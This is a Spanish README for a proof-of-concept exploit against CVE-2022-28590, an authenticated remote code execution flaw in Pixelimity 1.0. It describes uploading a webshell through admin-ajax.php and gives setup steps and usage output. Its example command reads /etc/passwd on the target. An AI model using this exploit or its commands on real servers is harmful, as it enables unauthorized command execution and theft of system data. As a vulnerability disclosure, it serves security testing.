
Exploit de prueba de concepto para CVE-2022-28590, una vulnerabilidad de ejecución remota de código en Pixelimity 1.0. Sube un webshell a través de admin-ajax.php para ejecución de comandos autenticados.
El descubrimiento original y el PoC manual son de tuando243:
Existe una vulnerabilidad de Ejecución Remota de Código (RCE) en Pixelimity 1.0 a través de admin/admin-ajax.php?action=install_theme.
Este PoC sube una webshell simple para ejecución remota de código adicional. Este exploit espera que la función system() esté permitida en el servidor, de lo contrario, se debe realizar un reconocimiento previo para detectar qué función permite la ejecución además de system.
git clone https://github.com/jcarabantes/CVE-2022-28590.git
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python CVE-2022-28590.py -h
python CVE-2022-28590.py -h
___ _ _ ____ ___ ___ ___ ___ ___ ___ ___ ___ ___
/ __)( \/ )( ___)___(__ \ / _ \(__ \ (__ \ ___(__ \ ( _ )| __)/ _ \ / _ \
( (__ \ / )__)(___)/ _/( (_) )/ _/ / _/(___)/ _/ / _ \|__ \_ /( (_) )
\___) \/ (____) (____)\___/(____)(____) (____)\___/(___/ (_/ \___/
Vulnerability discovered by tuando243
PoC author: @javicarabantes
usage: CVE-2022-28590.py [-h] [-d] [-q] --url URL --user USER [--password PASSWORD] [-c COMMAND]
optional arguments:
-h, --help show this help message and exit
-d Debug output
-q Do not print the banner
--url URL url: https://server:8081/
--user USER admin user
--password PASSWORD admin password
-c COMMAND Command to execute. Default: id
python CVE-2022-28590.py --url http://localhost:8082 --user myuser -c "cat /etc/passwd"
